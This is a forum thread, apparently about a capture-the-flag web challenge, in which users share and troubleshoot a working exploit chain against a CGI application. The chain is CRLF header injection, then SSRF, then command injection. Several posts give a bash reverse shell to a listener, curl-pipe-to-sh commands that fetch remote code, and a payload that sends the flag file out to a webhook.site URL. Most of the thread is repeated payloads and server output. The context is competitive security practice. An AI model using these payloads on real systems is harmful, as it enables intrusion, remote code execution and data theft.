Posts: 18
Threads: 0
Joined: Oct 2023
(03-23-2025, 03:09 PM)oyfyic Wrote: (03-23-2025, 02:24 PM)0xhdfg Wrote: (03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: (03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: (03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
props you entering http://yourIP, whereas you only need to provide your IP, nothing else
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 03:17 PM)randomregister Wrote: (03-23-2025, 03:09 PM)oyfyic Wrote: (03-23-2025, 02:24 PM)0xhdfg Wrote: (03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: //SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
props you entering http://yourIP, whereas you only need to provide your IP, nothing else
What do you mean by this. I'm confused rn coz of all the frustration of so many hours trying to do this
Posts: 2
Threads: 0
Joined: Feb 2024
Can someone explain the payload ??
And why is "-" working on target ? Because the regex should block the dash ...
Posts: 13
Threads: 0
Joined: Nov 2024
(03-23-2025, 03:09 PM)oyfyic Wrote: (03-23-2025, 02:24 PM)0xhdfg Wrote: (03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: (03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: (03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
The same happens to me, don't really know why I can't call the webhook, because if I do it locally with my machine it works. Any idea?
Posts: 4
Threads: 0
Joined: Mar 2025
(03-23-2025, 07:14 PM)0xhdfg Wrote: (03-23-2025, 03:09 PM)oyfyic Wrote: (03-23-2025, 02:24 PM)0xhdfg Wrote: (03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: //SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
The same happens to me, don't really know why I can't call the webhook, because if I do it locally with my machine it works. Any idea?
Same thing here. I tried everything posted in this thread too.
Posts: 18
Threads: 0
Joined: Oct 2023
(03-23-2025, 03:25 PM)oyfyic Wrote: (03-23-2025, 03:17 PM)randomregister Wrote: (03-23-2025, 03:09 PM)oyfyic Wrote: (03-23-2025, 02:24 PM)0xhdfg Wrote: (03-23-2025, 12:47 PM)0x02b375 Wrote: what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
props you entering http://yourIP, whereas you only need to provide your IP, nothing else
What do you mean by this. I'm confused rn coz of all the frustration of so many hours trying to do this
try it on your localhost, it will most likely work
Posts: 3
Threads: 0
Joined: Feb 2025
03-24-2025, 01:13 AM
(This post was last modified: 03-24-2025, 01:17 AM by htdgthdsfx.)
I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.
Posts: 14
Threads: 0
Joined: Feb 2025
(03-24-2025, 01:13 AM)htdgthdsfx Wrote: I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.
Yeah. Cant seem to get past the filters. Someone who has solved this challenge kindly tell us what you did because it just ain't working out for us
Posts: 14
Threads: 0
Joined: Feb 2025
(03-24-2025, 11:10 AM)0x02b375 Wrote: on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect
I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
Still not working. Kindly assist
Posts: 3
Threads: 0
Joined: Aug 2024
(03-24-2025, 01:12 PM)oyfyic Wrote: (03-24-2025, 11:10 AM)0x02b375 Wrote: on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect
I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
Still not working. Kindly assist
While working on this challenge, I had some issues with the '/'. Even tho I encoded it 2 times, it was kinda still not working. So instead I used a solve like this :
curl+xx.xx.xx.xx?a=$(ls) just avoid doing any kind of '/', here's the solve :
curl+xx.xx.xx.xx?a=$(cd .. && cd .. && cd .. && cat flag*)
also remember to double encode this.
|
